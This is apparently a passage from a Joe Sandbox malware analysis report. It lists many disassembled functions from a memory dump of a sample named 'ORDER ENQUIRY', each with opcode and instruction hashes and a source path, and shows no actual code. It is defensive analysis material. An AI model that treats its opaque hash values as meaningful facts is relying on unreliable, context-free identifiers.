Instruction Fuzzy Hash: 6DE052793003459FE719CF19C054B66BBB6FFD9A50F28C0A9A9488F205EB36E852CB51

Function 01AECA38 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 171a582530e72054139fe4b2bfaf921c5fb72bb456a363575702be35a3bd55a7
Instruction ID: 3a8c14fa54b6f3ba469d251eab54d46767e688ea2e74d3dd59efac7671bfa948
Opcode Fuzzy Hash: 171a582530e72054139fe4b2bfaf921c5fb72bb456a363575702be35a3bd55a7
Instruction Fuzzy Hash: 45D02B725811206ACB35F2197D08F933ADB9B50670F054861F10893014D524CC8197C4

Function 01AA823B Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction ID: e57f1ecbae618b00f3c2963ceef024db7f68c5e324380c7770d206f5bbcd2f19
Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction Fuzzy Hash: 34E08C31044A14EEDB322F15DE00B61BAA1FF64F11F14886EF181170A48779A889CA44

Function 01AB2050 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c97267b3f575f3aae907c93bbf8a8c756b4e34258c7351dcc60e90fcd917cb8d
Instruction ID: 72a3267f3191dcf1b2322957329223565516c18bfe1b406580fc7d181e2c4a11
Opcode Fuzzy Hash: c97267b3f575f3aae907c93bbf8a8c756b4e34258c7351dcc60e90fcd917cb8d
Instruction Fuzzy Hash: 75E08C321004906BC711FA5DDE51F9A739EEFA4660F044226F15197291CA20BC00C794

Function 01AE8A90 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction ID: 59acb9d7fa318bb49b63985ebc073bb9bbee1cc39dacc8fd1d312b96324bafa0
Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction Fuzzy Hash: 16E08633111A1487C728DE18D515B7277E4EF45720F09463EE61347790C534E544C794

Function 01B06AA4 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
Instruction ID: a073ddb89d79841198a3163261d318ccb815524bea6e05c5d17f5ac56abc4e2a
Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
Instruction Fuzzy Hash: 0FD05E36511A50AFC7329F1BEA00C53BBF9FFC4F60705066EA54583920C770A846CBA0

Function 01AEE59C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction ID: b467d5e157198fc838ead3153ccedd05926df797bc0e859d69952399d4cb9cfa
Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction Fuzzy Hash: CFD0A932208620ABDB32AA1CFC00FD333E8BB88B20F060499F00CC7050C360AC81CA84

Function 01B2E908 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
Instruction ID: 06edfa74ff26eb421f215a4e3ae4c318020e29d7cd43d77ff29a4607d216b827
Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
Instruction Fuzzy Hash: 5EE0EC35A506849FDF16DF9AC640F9EBBB9FB94B40F150058E5086B661C734E904CB40

Function 01AAA0E3 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction ID: aa4f88f4174a9b8903d4a277b7d102d2d4a1bc82470249b3e9dda93264e9950b
Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction Fuzzy Hash: 07D02232316030A3CF2897556900FAB6955AF80AA0F0A002D340AA3800C2048C42C2E0

Function 01AEA830 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
Instruction ID: 55c576427c72930a577e2b0e1f2ce40851695db2ee49cb755cbbe8f0fb096c69
Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
Instruction Fuzzy Hash: 55D012371D054DBBCB119F66DD01FA57BA9EB64BA0F448020B504875A0C63AE950D584

Function 01AECA24 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51addb58dcc16d3a7c4423ff79d437b4ef5a32486159eba029ec606f1c319021
Instruction ID: e6799e4895ae886e9f79eb7579f968ea6105983458fa16af9d7d4a35c4066fe9
Opcode Fuzzy Hash: 51addb58dcc16d3a7c4423ff79d437b4ef5a32486159eba029ec606f1c319021
Instruction Fuzzy Hash: 95D052306050128BDF2BEF0CCA1AAAE3AF1EB10A40F8400ACE601A2820E328D8018A00

Function 01AC02A0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
Instruction ID: e4f522411066833b7f6027ddb9a7c5cc510c628aade6bbfbfdd512b92452b97d
Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
Instruction Fuzzy Hash: 59D09239216A80CFD61A8B0CC6A4B1533A4BB44F44F810494E542CBB22E738D940CA00

Function 01AEC700 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction ID: 39c6356e3b218ec3ec5d3e0875b087b78aaaacf5de10ef8f48bdeb252cc69b92
Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction Fuzzy Hash: 72C01232294648AFCB12AA99CE01F567BA9EBA8B40F004021F2048B670C631E820EA84

Function 01AD0310 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: 945f9f359f3150a890a83dd0a908ced02616fd7974c9df93719e511b2101eb68
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: 0CD01236100648EFCB01DF41C990D9A772AFBD8710F109019FD1A076108A31ED62DA50

Function 01AB0750 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction ID: ba5618fea5925754fff37e5b6a882f0acd3271be4eb2f86f45c59d4af3fcafe9
Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction Fuzzy Hash: C0C00179601A428BCF2ADA2AD294A897BE4FB44B40F158894E8058BA22E625E805CA10

Function 01AF4340 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b43cbe1bdcb8e10c698f962277132892c8a30dd586c7d7df7e37fdea6b56ab73
Instruction ID: a12443446d09224e728f8999279bf5d5caf9e78f602ed6201a16c79eeafef76f
Opcode Fuzzy Hash: b43cbe1bdcb8e10c698f962277132892c8a30dd586c7d7df7e37fdea6b56ab73
Instruction Fuzzy Hash: 70900232A05C00529145715848845464405A7E0341B55C051E0424599CCB148B965361

Function 01AF4650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef48d3dee61833e0455841e0436e7a38f1afb0a3d8a717206c54312fdfcb5e58
Instruction ID: e703d5ef34a8f9766725669a971cddb0da5a9b506aa7fe589aa9ccb8eb0ce052
Opcode Fuzzy Hash: ef48d3dee61833e0455841e0436e7a38f1afb0a3d8a717206c54312fdfcb5e58
Instruction Fuzzy Hash: 21900262A01900824145715848044066405A7E1341395C155A05545A5CC7188A959369

Function 01AF2BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb24a0fb3495b775a1e35f9d45a0fceac8b225d336e59759c6826cd7439d4c04
Instruction ID: ced731cc928cfa143a19720919211be567d4689f0956f32bd92dd1747561110f
Opcode Fuzzy Hash: cb24a0fb3495b775a1e35f9d45a0fceac8b225d336e59759c6826cd7439d4c04
Instruction Fuzzy Hash: AA900232A0580842D15571584414746040597D0341F55C051A0024699DC7558B9577A1

Function 01AF2B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 846802bf6f6255640368420433303c5fd5f09099e0ee80c26d2f32e8dc4aca3b
Instruction ID: ad1a6fa0815f026d9ad99fc5011f1abf5ea8d1ea3c8438e3ac660859a09a8d8c
Opcode Fuzzy Hash: 846802bf6f6255640368420433303c5fd5f09099e0ee80c26d2f32e8dc4aca3b
Instruction Fuzzy Hash: 2590023260180842D10971584804686040597D0341F55C051A602469AED7658AD17231

Function 01AF2BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8435e5a7056b0c8689feb77a97e9dccdeec74bcfeca016f11c71697055ce34a3
Instruction ID: 15516548470ec48ef1d3419e9a71eba73f05c6a52ce0b5bcd8d36894af013707
Opcode Fuzzy Hash: 8435e5a7056b0c8689feb77a97e9dccdeec74bcfeca016f11c71697055ce34a3
Instruction Fuzzy Hash: FD90023260584882D14571584404A46041597D0345F55C051A00646D9DD7258F95B761

Function 01AF2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c60a789e449657a5dd6de8bac6be97ed77ae8785bf166f0a837bdc70a1f3de5
Instruction ID: bac177237088708c79e3e084b29b6a71a866b31d5ca82231a11d8d1ae8f23b85
Opcode Fuzzy Hash: 4c60a789e449657a5dd6de8bac6be97ed77ae8785bf166f0a837bdc70a1f3de5
Instruction Fuzzy Hash: 1A9002A2601940D24505B2588404B0A490597E0241B55C056E10545A5CC6258A919235

Function 01AF2AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5d330f372cad1043599477ea9bc9d1dca98cb34d053b26776f2f69c2bf645c2
Instruction ID: 71fe7fcd46c21bd3f7af364d6472a49690d192cc20b30bc9eceac01b21c4195f
Opcode Fuzzy Hash: a5d330f372cad1043599477ea9bc9d1dca98cb34d053b26776f2f69c2bf645c2
Instruction Fuzzy Hash: C690022662180042014AB558060450B0845A7D6391395C055F14165D5CC7218AA55321

Function 01AF2DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93094178b70dd2280a70af3699a192e9de943d4890cbe309ab889102ff35e239
Instruction ID: 6c6e80d6a6a8c04cdc40e59521c1cc6cc2b0b11f820066e2089137e7868e111b
Opcode Fuzzy Hash: 93094178b70dd2280a70af3699a192e9de943d4890cbe309ab889102ff35e239
Instruction Fuzzy Hash: 7B90023264180442D146715844046060409A7D0281F95C052A0424599EC7558B96AB61

Function 01AF2D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92d9b0c81aeb8280888ab7d409652f8948c75d4cde9cf1f4c6275d11658ac48e
Instruction ID: 78eedb609621eddc6d8bd675da3f2f1c955e7953674934a60348ff937699882e
Opcode Fuzzy Hash: 92d9b0c81aeb8280888ab7d409652f8948c75d4cde9cf1f4c6275d11658ac48e
Instruction Fuzzy Hash: 9390022260584482D10575585408A06040597D0245F55D051A10645DADC7358A91A231

Function 01AF2CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b880c149d6a1ad6b752bc68d309ff2d5de499c9d65d728ac342f7752afa7742
Instruction ID: 7d93026be31d2861d627a812e2804fc54f9aa4c8db82d4a3307d4d429d870c0c
Opcode Fuzzy Hash: 6b880c149d6a1ad6b752bc68d309ff2d5de499c9d65d728ac342f7752afa7742
Instruction Fuzzy Hash: CE90023260180443D10571585508707040597D0241F55D451A042459DDD7568A916221

Function 01AF2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56b8cc1bede362571fc3d4b79d8c77ec43889ff5c68f65cfecad7713ffd71926
Instruction ID: 090fa2b0a5639f90bfd4b1f43fbfc1c633091e0660211191b9d64b38dfae0e55
Opcode Fuzzy Hash: 56b8cc1bede362571fc3d4b79d8c77ec43889ff5c68f65cfecad7713ffd71926
Instruction Fuzzy Hash: 08900222A0580442D14571585418706041597D0241F55D051A0024599DC7598B9567A1

Function 01AF2C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a37f7e4c6d084b94c649bed0da3c3de3148cfa6959070f3c43cdfc18b8662b28
Instruction ID: 20be5e3b3166570e713eecb5a4981eef92eae745aa13dae647b8b9becddc8d36
Opcode Fuzzy Hash: a37f7e4c6d084b94c649bed0da3c3de3148cfa6959070f3c43cdfc18b8662b28
Instruction Fuzzy Hash: 5590023260180882D10571584404B46040597E0341F55C056A0124699DC715CA917621

Function 01AF2FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72fb8a58c6047b7c74132ae7caa7289b32c4d3b1b87aba9a3780f2892b6f7ece
Instruction ID: 26059bc958de6bfdc2ce077244d39d6ff4592bc0cf9541c24c2e0db5b0d09e91
Opcode Fuzzy Hash: 72fb8a58c6047b7c74132ae7caa7289b32c4d3b1b87aba9a3780f2892b6f7ece
Instruction Fuzzy Hash: A2900232601C0442D10571584808747040597D0342F55C051A516459AEC765CAD16631

Function 01AF2F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aa3615c7fd2bb64a69ab3fa57336baf0d972abb99d35b2a5005a36baa873813
Instruction ID: 3091b2df3532f631e640ff903c121f2cbd62d1d87f0cb57d4afcebbac3ab1dad
Opcode Fuzzy Hash: 8aa3615c7fd2bb64a69ab3fa57336baf0d972abb99d35b2a5005a36baa873813
Instruction Fuzzy Hash: 7690026261180082D10971584404706044597E1241F55C052A2154599CC6298EA15225

Function 01AF2EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c2c8571896961ed634c8704205e6cad7ba91f83d07eaf06db9f0ba49104ce3c
Instruction ID: b2fdbcf6edff2816614b1c2ec5b9cfea2ef5c514686f7765c50a3708f16b110c
Opcode Fuzzy Hash: 1c2c8571896961ed634c8704205e6cad7ba91f83d07eaf06db9f0ba49104ce3c
Instruction Fuzzy Hash: 40900262601C0443D14575584804607040597D0342F55C051A206459AECB298E916235

Function 01AF2E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b400f949e3b304fe1441fb17d2424bf7e247a72e1f6604f804b42b644789540e
Instruction ID: 677173c7911cb85eb0c48e3bc8f13e194e831d74a16dadf0353e09945efdf384
Opcode Fuzzy Hash: b400f949e3b304fe1441fb17d2424bf7e247a72e1f6604f804b42b644789540e
Instruction Fuzzy Hash: 1290022270180442D107715844146060409D7D1385F95C052E142459ADC7258B93A232

Function 01AF3090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 926a8404f26061c7d4193bfb2870f7a8a5c11a1f3d4db2fbb75afe99f5b06510
Instruction ID: 09b4c82992bea4b54482c0dbb153a67acb4b3d67ba5ef94e183d6670791400e1
Opcode Fuzzy Hash: 926a8404f26061c7d4193bfb2870f7a8a5c11a1f3d4db2fbb75afe99f5b06510
Instruction Fuzzy Hash: 1D90022264180842D145715884147070406D7D0641F55C051A0024599DC7168BA567B1

Function 01AF3010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d804b278630f0c976af6f5a491cde110a171a51eee00b274feb0e14729aef094
Instruction ID: 9ffb4703245dddef05847e4aeca554ec6ea0227343ae9fe593b9756f9197effc
Opcode Fuzzy Hash: d804b278630f0c976af6f5a491cde110a171a51eee00b274feb0e14729aef094
Instruction Fuzzy Hash: 94900222601C4482D14572584804B0F450597E1242F95C059A4156599CCA158A955721

Function 01AF35C0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14aa96d6fe81f173833dd3f96c73bbad369f6539ac263bb21a4b5f5004c56873
Instruction ID: b04df8a08ad3cdf8b76ac190a7bf45585467035e4dd658d6c6a6510aebb4f1f9
Opcode Fuzzy Hash: 14aa96d6fe81f173833dd3f96c73bbad369f6539ac263bb21a4b5f5004c56873
Instruction Fuzzy Hash: 03900232A0590442D10571584514706140597D0241F65C451A04245ADDC7958B9166A2

Function 01AF39B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49a45d8f1cd9ed5c5ee5d5686c020d9c8fa8ee882b7e2f973cfb69bebb7779d4
Instruction ID: a9b9b8ee810fcd59b1b683d8fac2c926dc429860e876f0596450b941695c9dd9
Opcode Fuzzy Hash: 49a45d8f1cd9ed5c5ee5d5686c020d9c8fa8ee882b7e2f973cfb69bebb7779d4
Instruction Fuzzy Hash: DD90022264585142D155715C44046164405B7E0241F55C061A08145D9DC6558A956321

Function 01AF3D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e91b7c9d3db6c6cd4ea613081d85603a88e6ee3c5b0c9ee4d1ca863a8a9a5a7
Instruction ID: 3a30424dd2b9fd0d00ac22aceab9f36e97986060f6a90be696b1b0cc66ff16ae
Opcode Fuzzy Hash: 4e91b7c9d3db6c6cd4ea613081d85603a88e6ee3c5b0c9ee4d1ca863a8a9a5a7
Instruction Fuzzy Hash: 7090023260280182954572585804A4E450597E1342B95D455A0015599CCA148AA15321

Function 01AF3D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82efa76704457b1f03e0b4fe3069007869b501c5a9ee8c18085e4cd90347d58f
Instruction ID: cc25a8345ca1c29f00bf1246e3e8c3e8bab6d54e178dbc07f6032e3a2babe7f6
Opcode Fuzzy Hash: 82efa76704457b1f03e0b4fe3069007869b501c5a9ee8c18085e4cd90347d58f
Instruction Fuzzy Hash: C790023660180442D51571585804646044697D0341F55D451A042459DDC7548AE1A221

Function 01AF2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: d1c13ae296f594338205f387ca54148b2c9fe58baae30b2c71f14179e29606f6
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 01AF2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

